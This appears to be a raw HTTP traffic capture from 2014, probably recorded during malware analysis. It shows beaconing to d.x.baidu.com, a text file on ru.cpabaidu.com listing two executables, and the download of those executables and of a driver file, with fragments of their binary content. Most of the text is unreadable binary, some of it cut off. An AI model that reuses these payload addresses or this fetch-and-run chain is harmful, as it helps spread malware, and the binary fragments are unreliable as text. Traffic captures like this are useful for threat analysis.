0..=..t..............guq."..=.[[email protected]...` ......t.
.L?l#...J?...GHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: appl
ication/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..
Content-Length: 150.....z........" b58974f666e28edaba3814768157053
<<< skipped >>>

POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 350
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` .......P.m]p..f!R...4H
.o...i..E..|.X.:......s`B.........m..8..cX..$G5...2...u.....[#z"......uz^........%Y.vv........d.....
|.u.U~.`....5|!.....<w....D/........h.......B}......[[email protected]....|.p j...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ..........."
>.r0#X....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: appli
cation/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..C
ontent-Length: 150.....z........" b58974f666e28edaba3814768157053d(...
[email protected].(.0..=..t..............guq."..=.[[email protected].
P.X...` ...........">.r0#X........


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8... ..3.}_.Ef=/......4..*20h......1.k.ubE....I..P........3POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z......
" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8.......=P.U..|.n...
k....n....jE..........d}z.....".z}..8.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8..z....5L)b?D\...R.| .~.n....h......{....
~X(...3.L....KiPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z......." b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8...I.,[_...*..'..i(......g}..>>......a......y.]`..{.sV#R.k
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ......z...9(
&.e6... ......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z.......
" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8........#9.H..G...."...EvM=??F......o.B.`.....u..o)L....gy
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ......8....S
........o.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicat
ion/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Cont
ent-Length: 150.....z........" b58974f666e28edaba3814768157053d(......
[email protected].(.0..=..t..............guq."..=.[[email protected]
...` ......... @.....$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Conte
nt-Type: application/octet-stream..Keep-Alive: timeout=30..Connection:
 Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814
768157053d([email protected].(.0..=..t..............guq."..=.[Q7....W..
[email protected]...` ......(s..,....D..{...HTTP/1.1 200 OK..Server: i
YuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeou
t=30..Connection: Keep-Alive..Content-Length: 150.....z........" b5897
4f666e28edaba3814768157053d([email protected].(.0..=..t..............gu
q."..=.[[email protected]...` ......8....S........o.HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150....
.z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..
t..............guq."..=.[[email protected]...` ......... @...
..$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicatio
n/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Conten
t-Length: 150.....z........" b58974f666e28edaba3814768157053d(....
<<< skipped >>>

POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8.....Q.C....E..R..7yZ......c..fKM...1v..b$b....J........-.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ......~q.W.|
4..^..sI.tHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicat
ion/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Cont
ent-Length: 150.....z........" b58974f666e28edaba3814768157053d(......
[email protected].(.0..=..t..............guq."..=.[[email protected]
...` ......~q.W.|4..^..sI.t..



GET /baidu/test.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 31 Oct 2014 10:31:26 GMT
Accept-Ranges: bytes
ETag: "a7e154d3f5f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:06:57 GMT
Content-Length: 130
hXXp://ru.cpabaidu.com/baidu/F1023_s_30803.exe F1023_s_30803.exe..http
://ru.cpabaidu.com/baidu/G1023_s_70904.exe G1023_s_70904.exe...
.


GET /baidu/F1023_s_30803.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 31 Oct 2014 10:21:12 GMT
Accept-Ranges: bytes
ETag: "7e31f764f4f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:06:57 GMT
Content-Length: 17532120
[email protected]........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............'.....=$;*[email protected].........&
..h..........Pk.......................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc....h.
...&..j..................@[email protected]'[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>

GET /baidu/G1023_s_70904.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 31 Oct 2014 10:26:22 GMT
Accept-Ranges: bytes
ETag: "dd0e71df5f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:07:50 GMT
Content-Length: 30855896
[email protected])...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
............ *......H:*[email protected].........$
..I..........P........................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc....I.
...$..J..................@[email protected]........*[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 222
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..j:.
..i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.
[email protected]...` ...X..M(...jI.i......vZ......#...F..?P$q...y.....3......B..M.G...d..7.u.<.;[email protected].. 0..=.....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t
..A.c. 8.U......v.6..#.....A..G...d...*\.<[email protected]...` ......1CZ
Mpu..<z.n..R.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: ap
plication/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive
..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(
.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..
[email protected]...` ......1CZMpu..<z.n..R...



GET /client1/common/patch/32175066779/putips_wording.dat HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Fri, 28 Nov 2014 08:33:25 GMT
Date: Wed, 29 Oct 2014 08:33:25 GMT
Server: nginx
Content-Type: application/octet-stream
Content-Length: 452
Last-Modified: Mon, 29 Sep 2014 07:17:46 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 682497
Via: 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="putips_wording.dat"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
y........rbF.....m.{...P.?.(0sui_)....2(p..a.$.M..$..p.... ..R. T]....
f.. .\[email protected]..!.[|`...4..&.87R...D!)[email protected].....'..'.oI.....M4....
F..8.q..`...~d.G9.W.RC...n.......I./....O.,..k.].6..k.R.MF...i...8jO. 
..Q..De._C..|&.L...|..8.`.^k)..q....d..."7.H.`...zI..r....i.*d]....}/.
..........s.N..]..x..u.......g.x.L.H.1.2..v....FP.... >..k...B..t..
.k..............c.0......r~...U....e.A.N...L~]H.......@r..............
|.z.*-...P<A..w....g.x...aK...e[.{...



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...(..;vk.....)._U..8R.
[..)24.I.u...4$U/....K
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......=.o..
.ly...._....



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ... .....~...U....4........V.u......X.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ............
Mj...x.4`0..



GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "beb1d8b82cb8c9757d59de95e6371f01:1415221513"
Last-Modified: Wed, 05 Nov 2014 21:05:13 GMT
Date: Thu, 06 Nov 2014 06:07:35 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..".0..!x...0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Sign
ing 2010 CA..141105210003Z..141119210003Z0.. [email protected]
0730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&..
.130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s.
.130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9.
.130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H..
....120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......
0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v....
.w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...
iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M8
3...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID
{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........
'u..140521222808Z0!......0..........I..130912181631Z0!....6e...~..T...
....130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u..
....130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v.........
.n..120724160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!
....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....
@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,
.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.
....120518121623Z0!...<%a.=.d.......O..120424164254Z0!...@.....
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...(......
.]....B..w.-.....$)..O..b........
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......,....
....}..Ys...



GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Sun, 09 Nov 2014 10:45:45 GMT
Date: Fri, 10 Oct 2014 10:45:45 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 18710
Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 2316159
Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 shiben13:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="hipsClient.xml"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
.......k..65.Mf.?../..m.x..`.D..#........x$....x=.B...$j......y}.....R
.C[4x../../1........ .q..=../7L..R..if.%.....aa.....y.c.oO...T.K......
.>F..:. ..h. .>..l....vYe.X.u.C:...yQ.....6..Gr./....r. b.....W$
.8.R...7....1.......$.....PYf.E..!..p...0P.-..{..|!.j....G...K........
.......0.........%.b.a.2*.'...~.r..!*2..I...mv..b.-..z&....v...B.q.~h.
^r.....r..x.D(.3s.zI...G...........L.y.^.....|.D9[.W,....\..T.x.....[.
..C... ..$yKI.Q.LG..fG....".{...fP..S1...Mz).]Ln.....2v...d...seab..v.
......u...`*.....#...^@..G..Sb.dL5.8nhd.l.\.y...`.w.......3.u........A
....kq~.k....}-.| .......^...Z.})..Fq./.....U.)..:..8.j.q.*.e.#..-1..J
e...(....{..s.`se....Q.x......n..>......o4.>.3.xRO..X.~>..C`.
`.....f...o.h.),N.ad.#.-.......1.........(.S..[.....)..z....w.....G.#.
.(..=.]..p.E....Q....H...7........!....h?......_...1../X.....(.v......
h..o..b......p.QH..-..*..M.}...c.1h..}..k.ro6\...7..4.Za.....m........
>2.E...Q.....%A.b..:.....$..p.c.W....U.m...JL..f.i!.<..H.....n.)
../..2.?6.B.|j.IX'.bY.?1.........}...Cc....s].h........KY.... .....2.l
.#..........Vq. ........5...O;..A.Z..........7..:$..s..|...[.u...&O.kq
[email protected]...>0.....o#..>....c....Os.<!.a
.=.O......i.n.2GR-_prM..q..@.@.........>...Bl....&.5w..P.d9..N....S
...5..r....d@......(...-g,/..Z6...o}&}'.D......,...Cj..1..'...#j..[...
,..*[email protected]/[1....~..'^....h.......O^.?...m.......\
...[.?bZrl.I.X7E.......1E... .....&S.. .#.S&\g.0.49.....r.Z...~.0.K...
..R,.4.d.6cG...#9.......E..._.<.@.)V0.:.........B..B.Z.-".1o.T.
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d([email protected]...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v
[.o.'...aG.s.2....@....%[email protected]...` ........



GET /client1/common/patch/34282863525/BDMWrench.sys HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Sat, 22 Nov 2014 17:01:21 GMT
Date: Thu, 23 Oct 2014 17:01:21 GMT
Server: nginx
Content-Type: application/octet-stream
Content-Length: 216648
Last-Modified: Thu, 23 Oct 2014 16:47:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1170408
Via: 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 shiben14:8032 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BDMWrench.sys"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
[email protected].........
..!..L.!This program cannot be run in DOS mode....$...................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................TW^.:.^.:.^.:.W...Z.:.W...S.:.^.;...:...g.Y.:.
..e._.:.W...G.:.W..._.:.W..._.:.Rich^.:.........................PE..L.
....HT.................E..........>........=.......................
........ ..............................................P...P.......8..
.......... ..H#...........?..................................@........
....=...............................text... 8.......8.................
. [email protected]... P.......P.......
[email protected]........................... ....rsrc...8......
[email protected]... [email protected].....
..........................................U....d.l...3..E..E.P......u.
.E.QP.$....E.PV......M.3.................U............l...3...$....SV.
u.W3.j...$....SP..$............V.D$@P.\$ ..@>[email protected]
.S.D$`.D$PS.D$DP.D$PPh.....D$HP.|$\.\$`.D$h@....\$l.\$p...>..;..D$.
......S.D$.P..=..S.0S.t$(..p=..;..D$.}..\$.......D$..X8.D$..X<.D$DP
.D$LPWj..t$....>..;..D$........5(>..SSj@..$....P.D$,PSSS.t$4
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d([email protected]...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` ........



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 230
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...`....Z..,......".....tQ..;.v.m`..;....:..W....>:....<.1...V....`,,.8...o........G.n%}-&:....^.Hb..kPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...8..lv..LPL.}a.lD..N.?X{ VvG..m....>\..F.. .p.Ky...[kM....F.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...8..ybV...%`...yH&6....x7.V=.:e#.v.....$$.CV,[email protected]...<3.....POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 238
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...h........
p....a.8d.......^[email protected]....{.x.!^.V.........I.....vJ.c. ...{...V......7.Qq.....{..Tf...>... POST / HTTP/1.1
Connection: Keep-Ali
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......F.1.S
...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicat
ion/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Cont
ent-Length: 150.....z........" b58974f666e28edaba3814768157053d(......
...28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]
...` .......F.1.S...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Conte
nt-Type: application/octet-stream..Keep-Alive: timeout=30..Connection:
 Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814
768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T.
..p..6|[email protected]...` .............'.76.....HTTP/1.1 200 OK..Server: i
YuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeou
t=30..Connection: Keep-Alive..Content-Length: 150.....z........" b5897
4f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....
:PfR...G{...I-.T...p..6|[email protected]...` .......Qh.8|.:..&_.0x.HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ..............
....RX.THTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicatio
n/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Conten
t-Length: 150.....z........" b58974f666e28edaba3814768157053d(....
<<< skipped >>>

POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 230
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...`..%.w.....3.
 F....m..vC........J.
...FI~.k..)V.)(..Z.n [.........N6.....F...{.S'.[......Usr....qPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...8..X...j.'?.Z1...R......./..z..o..sV....)..b
Z...[.. .P.B<.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 182
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...0...7.......2..w......Zpw.7..H^.oN.....J-.K...`v3Q.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 182
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z.......*" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...0..<..V..1..W!x3.m..r!.a...K.."....8....^fm...f..<.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 182
Content-Type: application/octet-stream
Host:
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...........Y
%\e.....2.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicat
ion/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Cont
ent-Length: 150.....z........" b58974f666e28edaba3814768157053d(......
...28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]
...` ...........Y%\e.....2.HTTP/1.1 200 OK..Server: iYuntianSvr..Conte
nt-Type: application/octet-stream..Keep-Alive: timeout=30..Connection:
 Keep-Alive..Content-Length: 150.....z.......*" b58974f666e28edaba3814
768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T.
..p..6|[email protected]...` .......U.!.../..c....|HTTP/1.1 200 OK..Server: i
YuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeou
t=30..Connection: Keep-Alive..Content-Length: 150.....z........" b5897
4f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....
:PfR...G{...I-.T...p..6|[email protected]...` ..............U...A.[ HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150....
.z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......603..qB
E...K..gHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicatio
n/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Conten
t-Length: 150.....z....... " b58974f666e28edaba3814768157053d(....
<<< skipped >>>

POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 158
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......|{.a....8>6.Y..,.u8f....POST / HTTP/1.1
